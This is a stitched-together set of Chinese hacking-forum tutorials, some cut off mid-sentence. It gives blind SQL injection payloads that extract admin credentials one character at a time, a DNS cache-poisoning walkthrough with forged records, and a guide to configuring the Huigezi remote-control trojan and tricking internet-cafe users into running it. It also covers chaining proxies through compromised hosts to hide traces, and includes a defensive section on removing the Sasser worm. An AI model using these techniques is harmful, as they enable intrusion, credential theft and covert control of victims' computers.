就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了

其实猜出了前几个字母你就自己可以想像了，用到社会工程学了哟~，比如猜到了ad ，你就可以猜了

administrator,or ,admin,or ,adminstra.......这样猜的效率比较高哟!

工作还没有完,别忙着跑了,还有10位密码,呵呵

and 1=(select count(*) from admin where left(password,1)=a)

经过无数次错误之后（首先大家得有个准备SQL注入有时候就是很烦的）

htttp://host/news/article_view.asp?id=2499 and 1=(select count(*) from admin where left(password,10)=administra)
结果密码是administra
就这么简单，我只

现在的Internet上存在的DNS服务器有绝大多数都是用bind来架设的,使用的bind版本主要为bind 4.9.5+P1以前版本和bind 8.2.2-P5以前版本.这些bind有个共同的特点,就是BIND会缓存(Cache)所有已经查询过的结果,这个问题就引起了下面的几个问题的存在.(什么叫BIND?BIND是一款由ISC维护的Internet域名名字系统实现。)关于BIND有个BIND问题集锦大家有兴趣可以看看:http://www.cngnu.org/technology/2494/281.html

1>.DNS欺骗
在DNS的缓存还没有过期之前,如果在DNS的缓存中已经存在的记录,一旦有客户查询,DNS服务器将会直接返回缓存中的记录.

下面我们来看一个例子:
一台运行着unix的Internet主机,并且提供rlogin服务,它的IP地址为123.45.67.89,它使用的DNS服务器(即/etc/resolv.conf中指向的DNS服务器)的IP地址为98.76.54.32,某个客户端(IP地址为38.222.74.2)试图连接到unix主机的rlogin端口,假设unix主机的/etc/hosts.equiv文件中使用的是dns名称来允许目标主机的访问,那么unix主机会向IP为98.76.54.32的DNS服务器发出一个PTR记录的查询:

123.45.67.89 -> 98.76.54.32 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: 2.74.222.38.in-addr.arpa PTR

IP为98.76.54.32的DNS服务器中没有这个反向查询域的信息,经过一番查询,这个DNS服务器找到38.222.74.2和38.222.74.10为74.222.38.in-addr.arpa.的权威DNS服务器,所以它会向38.222.74.2发出PTR查询:


98.76.54.32 -> 38.222.74.2 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: 2.74.222.38.in-addr.arpa PTR

请注意,38.222.74.2是我们的客户端IP,也就是说这台机子是完全掌握在我们手中的.我们可以更改它的DNS记录,让它返回我们所需要的结果:


38.222.74.2 -> 98.76.54.32 [Answer]
NQY: 1 NAN: 2 NNS: 2 NAD: 2
QY: 2.74.222.38.in-addr.arpa PTR
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN: trusted.host.com A 38.222.74.2
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10

当98.76.54.32的DNS服务器收到这个应答后,会把结果转发给123.45.67.98,就是那台有rlogin服务的unix主机(也是我们的目标 :) ),并且98.76.54.32这台DNS服务器会把这次的查询结果缓存起来.


这时unix主机就认为IP地址为38.222.74.2的主机名为trusted.host.com,然后unix主机查询本地的/etc/hosts.equiv文件,看这台主机是否被允许使用rlogin服务,很显然,我们的欺骗达到了.

在unix的环境中,有另外一种技术来防止这种欺骗的发生,就是查询PTR记录后,也查询PTR返回的主机名的A记录,然后比较两个IP地址是否相同:

123.45.67.89 -> 98.76.54.32 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: trusted.host.com A

很不幸,在98.76.54.32的DNS服务器不会去查询这个记录,而会直接返回在查询2.74.222.38.in-addr.arpa时得到的并且存在缓存中的信息:


98.76.54.32 -> 123.45.67.89 [Query]
NQY: 1 NAN: 1 NNS: 2 NAD: 2
QY: trusted.host.com A
AN: trusted.host.com A 38.222.74.2
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10

那么现在unix主机就认为38.222.74.2就是真正的trusted.host.com了,我们的目的达到了!

这种IP欺骗的条件是:你必须有一台Internet上的授权的DNS服务器,并且你能控制这台服务器,至少要能修改这台服务器的DNS记录,我们的欺骗才能进行.


2>.拒绝服务攻击 Denial of service

还是上面的例子,如果我们更改位于38.222.74.2的记录,然后对位于98.76.54.32的DNS服务器发出2.74.222.38.in-addr.arpa的查询,并使得查询结果如下:
因为74.222.38.in-addr.arpa完全由我们控制,所以我们能很方便的修改这些信息来实现我们的目的.

38.222.74.2 -> 98.76.54.32 [Answer]
NQY: 1 NAN: 2 NNS: 2 NAD: 2
QY: 2.74.222.38.in-addr.arpa PTR
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN:www.company.com A 0.0.0.1
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10

这样一来,使用98.76.54.32这台DNS服务器的用户就不能访www.company.com了,因为这个IP根本就不存在!

3>.偷取服务 Theft of services

还是上面的例子,只是更改的查询结果如下:

38.222.74.2 -> 98.76.54.32 [Answer]
NQY: 1 NAN: 3 NNS: 2 NAD: 2
QY: 2.74.222.38.in-addr.arpa PTR
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN:www.company.com CNAMEwww.competitor.com
AN: company.com MX 0 mail.competitor.com
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.svent

灰鸽子(纪念版)不会使用的人还很多，（什么你不知道什么叫灰鸽子？那你知道什么叫冰河或是什么男生什么女生呢？） 灰鸽子还有自己的网站http://main.huigezi.com/main.asp
，今天我们只是简单的说一下它的使用，如果在使用中遇到任何问题除了可以在这里问以外还可以到http://main.huigezi.com/main.asp去看看，一般都没问题的。
挺进版加上了穿过局域网控制内部机器的

功能，又是第一个使用域名来储存客户端IP地址的，灰鸽子(挺进版)文件：


P_Client.exe (客户端文件)


Server.exe (服务端文件，如果你想控制对方就可以配置一下，让对方运行，你就可以用客户端控制他了!)


程序界面(P_Client.exe)：



此主题相关图片如下：

看了上面界面的注示，是不是有了一个底!那好我们就来一次“自动上线”式的控制吧!


注册域名：


在配置服务器程序之前，如果你没有域名可用的话，请随我来注册一个免费的域名吧!


1.点击工具栏上的第三个按扭!在程序界面里的图片上注明了注册域名、更新IP到域名、主机搜索的那个按扭!


此主题相关图片如下：

按了按钮后你会看见上面的界面了，看到了“注册域名”了吧!
点击“注册域名”选项卡!你会看见下面的界面!

此主题相关图片如下：

好的，现在我们就来注册一个域名吧!可以点击“.126.com”来改变申请域名的后缀，这里不我们不点击，保持不变!



现在我们填好域名、密码、E-Mail，就可以按注册域名按扭了!(在这里请确保你已经上网了!)按完成请注意注册结果框里



的提示信息!如果成功的话，大家往下看，注册失败请换个域名试试!

配置服务端程序：



好的，现在大家有了域名了，可以配置服务端程序了!大家在程序界面里看到了配置服务端程序的按扭了吧!就是工具

栏上的第七个按扭!点它就会出现下面的界面!



此主题相关图片如下：

好的，我们点“下一步”继续


此主题相关图片如下：

按上图所说的做吧，好的，我们已经完成了最关键的一步了!


为了节省时间，大家可以一直按“下一步”按扭
好的，我们配置服务器的工作就完成了!
现在我们要的就是把我们配置的“Server.exe”，让


对方运行了(比如说在网吧运行一下)
安装传播已经配置的服务端程序：



好的，我们现在已经把我们刚配置的服务器端程序发给了一个在网吧上网的朋友!现在就看一个怎么控制吧!

等待自动上线：
如果网友已经打开了我们发过去的服务端!应该在一分钟之内自动上线!如果“文件管理器”中多出了绿屏的主机，就是自动上线的主机了!我们选中“文件管理器”中自动上线的主机进行连接!如果不出错的话应可以看到它的驱动器列表了!
哈哈，你不仅可以管理文件，还可以进行其它控制
这就是这个软件的简单应用 很简单吧
再说说灰鸽子2003的一些使用心得吧
2003的界面类似XP，内容方面和这个挺进版差不多，最大的改动就是搜索主机的IPC弱口令探测这个东西去掉了，速度没什么改进，但比辐射版要快不少。
至于使用感受：首先用灰鸽子自己本身得搜索功能还真得难找到一个好的机子，搜索速度太慢了，这时候我们可以用SUPERSCAN这种专业的扫描软件，添好默认的端口，能大大提高效率。还有就是关键在于怎么骗取别人运行自己的服务端。最快的就是先把自己的服务端加载在网页中利用IE的自动下载运行漏洞，反正不会用很对人去升级计算机系统漏洞的。再到各大的论坛说自己有免费的QQ或电影看，贪小便宜的人肯定很多的。
申明：我网站和论坛的页面绝不含任何这种东西或是木马，请大家放心。

忙着和女朋友玩,没怎么上网,中间就关注了一下震荡波,算是做了个小专题,在个人BLOG上转了一些好文章.接下来我会提高更新速度,欢迎大家多来逛逛哦!

本专集特开辟--“震荡波(Worm.Sasser)”专题
病毒中文名：震荡波
病毒英文名：Worm.Sasser
病毒大小：15,872字节
病毒类型：蠕虫病毒
病毒危险等级：★★★★★
病毒传播途径：网络
病毒依赖系统：Windows NT/2000/XP

在本地开辟后门。监听TCP 5554端口，做为FTP服务器等待远程控制命令。病毒以FTP的形式提供文件传送。黑客可以通过这个端口偷窃用户机器的文件和其他信息。 病毒开辟128个扫描线程。以本地IP地址为基础，取随机IP地址，疯狂的试探连接445端口，试图利用windows的LSASS 中存在一个缓冲区溢出漏洞进行攻击，一旦攻击成功会导致对方机器感染此病毒并进行下一轮的传播，攻击失败也会造成对方机器的缓冲区溢出,导致对方机器程序非法操作,以及系统异常等。

5月1日，“震荡波(Worm.Sasser)”病毒在网络出现，由于该病毒是通过漏洞进行传播的，因此这几日用户如果上网极有可能会感染该病毒，然后出现系统反复重启、机器运行缓慢，出现系统异常的出错框等现象，如果用户出现了上述现象，则需要对该病毒进行清除。

一、手工清除四部曲。

1、断网打补丁。

如果不给系统打上相应的漏洞补丁，则连网后依然会遭受到该病毒的攻击，用户应该先到以下地址http://www.microsoft.com/china/technet/security/bulletin/ms04-011.mspx下载相应的漏洞补丁程序，然后断开网络，运行补丁程序，当补丁安装完成后再上网。

2、清除内存中的病毒进程

要想彻底清除该病毒，应该先清除内存中的病毒进程，用户可以按CTRL+SHIFT+ESC三或者右键单击任务栏，在弹出菜单中选择“任务管理器”打开任务管理器界面，然后在内存中查找名为“avserve.exe”的进程，找到后直接将它结束。

3、删除病毒文件

病毒感染系统时会在系统安装目录（默认为C:\WINNT）下产生一个名为avserve.exe的病毒文件，并在系统目录下(默认为C:\WINNT\System32)生成一些名为<随机字符串>_UP.exe的病毒文件，用户可以查找这些文件，找到后删除，如果系统提示删除文件失败，则用户需要到安全模式下或DOS系统下删除这些文件。

4、删除注册表键值

该病毒会在电脑注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run项中建立名为“avserve.exe”，内容为：“%WINDOWS%\avserve.exe”的病毒键值，为了防止病毒下次系统启动时自动运行，用户应该将该键值删除，方法是在“运行”菜单中键入“REGEDIT” 然后调出注册表编辑器，找到该病毒键值，然后直接删除。

二、自动清除三部曲

1、使用瑞星杀毒软件进行清除

用户可以将瑞星杀毒软件标准版或下载版产品升级到16.24.42版本，并进行系统盘和内存的杀毒。

2、使用瑞星在线杀毒进行清除

用户还可以使用瑞星免费的在线杀毒产品（http://online.rising.com.cn/）查找系统中是否存在病毒，然后用在线杀毒进行清除。

3、使用瑞星免费专杀工具进行清除

用户还可以到http://it.rising.com.cn/service/technology/RS_sasser.htm网址下载免费的“震荡波病毒专杀工具”然后对电脑进行病毒扫描。

5月1日惊现互联网的“震荡波 (Worm.Sasser)”病毒来势汹汹，该病毒是通过微软的最新高危漏洞 —LSASS 漏洞(微软MS04-011 公告)进行传播的，危害性极大，目前 WINDOWS 2000/XP/Server 2003 等操作系统的用户都存在该漏洞，这些操作系统的用户只要一上网，就有可能受到该病毒的攻击。下面就教用户如何快速识别“震荡波(Worm.Sasser)”病毒。

　　如果用户的电脑中出现下列现象之一，则表明已经中毒，就应该立刻采取措施清除该病毒。

　　一、出现系统错误对话框

　　被攻击的用户，如果病毒攻击失败，则用户的电脑会出现 LSA Shell 服务异常框，接着出现一分钟后重启计算机的“系统关机”框。

二、系统日志中出现相应记录

　　如果用户无法确定自己的电脑是否出现过上述的异常框或系统重启提示，还可以通过查看系统日志的办法确定是否中毒。方法是，运行事件查看器程序，查看其中系统日志，如果出现如下图所示的日志记录，则证明已经中毒。
三、系统资源被大量占用

　　病毒如果攻击成功，则会占用大量系统资源，使CPU占用率达到100%，出现电脑运行异常缓慢的现象。

　　四、内存中出现名为 avserve 的进程

　　病毒如果攻击成功，会在内存中产生名为 avserve.exe 的进程，用户可以用Ctrl+Shift+Esc 的方式调用“任务管理器”，然后查看是内存里是否存在上述病毒进程。

　　五、系统目录中出现名为 avserve.exe 的病毒文件

　　病毒如果攻击成功，会在系统安装目录（默认为 C:\WINNT ）下产生一个名为avserve.exe 的病毒文件。

　　六、注册表中出现病毒键值

　　病毒如果攻击成功，会在注册表的 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 项中建立病毒键值： "avserve.exe "="%WINDOWS%\avserve.exe " 。

背景介绍：

冲击波（Worm.Blaster）病毒2003年8月12日全球爆发，该病毒由于是利用系统漏洞进行传播，因此，没有打补丁的电脑用户都会感染该病毒，从而使电脑出现系统重启、无法正常上网等现象。

2004年5月1日，“震荡波(Worm.Sasser)”病毒在网络出现，该病毒也是通过系统漏洞进行传播的，感染了病毒的电脑会出现系统反复重启、机器运行缓慢，出现系统异常的出错框等现象。

两大恶性病毒的四大区别：

一、利用的漏洞不同

冲击波（Worm.Blaster）病毒利用的是系统的RPC DCOM漏洞，病毒攻击系统时会使RPC服务崩溃，该服务是Windows操作系统使用的一种远程过程调用协议。震荡波(Worm.Sasser)病毒利用的是系统的LSASS服务，该服务是操作系统的使用的本地安全认证子系统服务。

二、产生的文件不同

冲击波（Worm.Blaster）病毒运行时会在内存中产生名为msblast.exe的进程，在系统目录中产生名为msblast.exe的病毒文件，震荡波(Worm.Sasser)病毒运行时会在内存中产生名为avserve.exe的进程，在系统目录中产生名为avserve.exe的病毒文件。

三、 利用的端口不同

冲击波（Worm.Blaster）病毒会监听端口69,模拟出一个TFTP服务器，并启动一个攻击传播线程,不断地随机生成攻击地址，尝试用有RPC漏洞的135端口进行传播。震荡波(Worm.Sasser)病毒会本地开辟后门，听TCP的5554端口，然后做为FTP服务器等待远程控制命令，并疯狂地试探连接445端口。

四、 攻击目标不同

冲击波（Worm.Blaster）病毒攻击所有存在有RPC漏洞的电脑和微软升级网站，而震荡波(Worm.Sasser)病毒攻击的是所有存在有LSASS漏洞的电脑，但目前还未发现有攻击其它网站的现象。

昨天上网郁闷了,谁当服务器拨号谁就中病毒,1分钟倒记时,而且服务器不能通过IE打开网页,但是可以通过其他方式,比如TT.最开始以为是冲击波,可记得我早就打了补丁啊,而且装了SP4.装了最新病毒库的无法杀毒,在进程里发现一个陌生的IE,占了大量的资源,avserve,怀疑一切与他有关,关掉之后,可以通过IE打开网页了.认为是什么木马后门,通过我的机器在向外发信息攻击,占了本机大量资源.
实在没办法,逼者要上网把最后的网页改好,明天好去见老婆,只好装了个SKYNET,把安全模式设置成高,对端口进行监控并且禁止信息发送和接受.发现大量的陌生IP连接本机的某些端口,差点以为自己成了肉鸡.今天在落伍上看见有人骂西安电信,见有人提到了震荡波和瑞星,上去一看,终于明白了.

跳板，这里的不是指跳水的扳子（废话），我想大家多跳板都应该有个基本的认识：就是通过这个东西跳过什么东西，掩盖什么东西。给大家个图大家就明白跳板是什么了

此主题相关图片如下：


知道了吧，就是隐藏你的足迹，想要找出你，就必须连接x个你所通过的机器，并且找出他们的log，如果碰巧有一个没有记录，线就断了:)，即使都记录了，log里面登记的IP也是上一级跳板主机的IP…
当然跳板还可以用于：
.QQ或者ICQ
. ftp客户端
. mail客户端
. telnet客户端
. 端口扫描器
. (以及几乎所有在网络中所使用的工具)
想想如果不要跳板我们不是很危险吗？

这可能不适用于某些IRC服务器，因为它们常常查看打开着的wingates及proxies。

先说简单的windows下的sock代理怎么做
一.找一些运行wingate的主机

原因：因为wingates的默认安装打开端口1080并且不记录socks连接。
怎么找这些机子呢？你可以用‘代理猎手’，好象中国人都用这个，国外人好象喜欢用wingatescan，或是从这里可以找到最新的：http://www.cyberarmy.com/lists/wingate（国外的，我建议大家用国外的，因为追查有难度啊）

二.确认列表中的主机的确运行着wingate

三.安装一个能截取发送的信息包的软件
我使用的是一个叫purpose的工具，你可以从
http://www.buffy.nu/article.php3?id_article=3043

要设置它，只要在socks server填上: 127.0.0.1 port 8000.
选择’socks version 5’.再点击’resolve all names remotely’.
不要选’supported authentication’。

在主界面，选择new然后建立一个你希望socks支持的程序的快捷方式

对所有你想匿名的程序做同样的工作,至于有哪些你就自己想了

四.安装socks chainer
从http://www.ufasoft.com/socks下载该工具

在service菜单, 点击new。在name段输入Chain，port则输入8000。

点击new 并且将你找到最快的wingates的IP填进去，端口则填1080。

使用 ’<’ 和 ’>’, 你可以添加或者移除socks. 记得一定要在使用前测试所有的socks.


五.测试你的设置

用你所建立的浏览器的快捷方式打开浏览器，连接到
http://cavency.virtualave.net/cgi-bin/env.cgi或者
http://internet.junkbuster.com/cgi-bin/show-http-headers

同样，打开你的telnet客户端并尝试telnet到
ftp.cztc.edu.cn

你可以通过https://sites.inka.de:8001/cgi-bin/pyca/browser-check.py来检测SSL或者
FTP到ftp.zedz.net——或者其它的FTP来验证你的IP。

在上面的测试中，远程主机上留下的将是你最后一个chain的IP地址。当然你可以在自己的
网络里进行测试……
再说说另一种吧SkSockServer“（下面称SSS）
这个与上面的利用著名的wingate做的有什么区别？
1/ 普通的Sock代理程序不支持多跳板之间的连续跳，而SSS却可支持最多达255个跳板之间的连跳运动
2/ 普通的Sock代理程序之间的数据传输是不加密的，而SSS支持的跳板之间传输的数据是经过动态加密的，也就是说每次传输过程中，数据加密的方式都不相同。就算你不幸在..的过程中被webmaster发现，普通的sock代理程序将会被webmaster用sniffer把你的信息一览无遗，而恰巧你用的是SSS的话，呵呵～他将会看到一堆乱码
3/普通的sock代理程序在设置上比较烦琐，而SSS只用两步就全都ok了。（具体步骤将在下面说明） 普通的sock代理程序要不然只支持Tcp或Udp的连接，很少有二者兼顾的，而SSS却全部支持
下面是一个大哥写的教程我觉得不错，就COPY一下了

找A机上传SSS文件，（怎么找我想你应该有个肉鸡吧）如果权限足够的话，应该可以完成SSS的安装和启动。所示：
SSS命令参数的说明：
-install 在NT机上安装SSS
-remove 移除SSS.
-debug 呵呵～snake进行debug用的，对于咱们老百姓来言无用。
sksockserver –install 安装sksockserver。

net start skserver 启动skserver服务。：（注意：这可是在A机上运行的，可不是你自己的爱机）

Ok啦～A机跳板完成，下面进行B机跳板的安装：
打开终端服务客户端连上找到的B菜机。
用B菜机的IE直接下载SSS~~呵呵～如图2：（IP地址隐去啦～大家自己找菜机吧）

图２

在B菜机上配置sockservercfg（因为是用vc编写的sockservercfg,所以必须有mfc的库文件，如果出现“无法定位序数XXXX于动态连接库mfc42.dll”的话，大家可以在自己的机子上找找，最终上传到B菜机的路径：X:\winnt\system32）
sockservercfg图例说明：分见图3、图4、图5：




图例说明：


图3：SSS的配置界面一：在名称处可以填上任意的程序说明，以方便糊弄网管。要注意三处画红圈处，分别为：程序在开机时自动启动（我第一次用的时候还以为是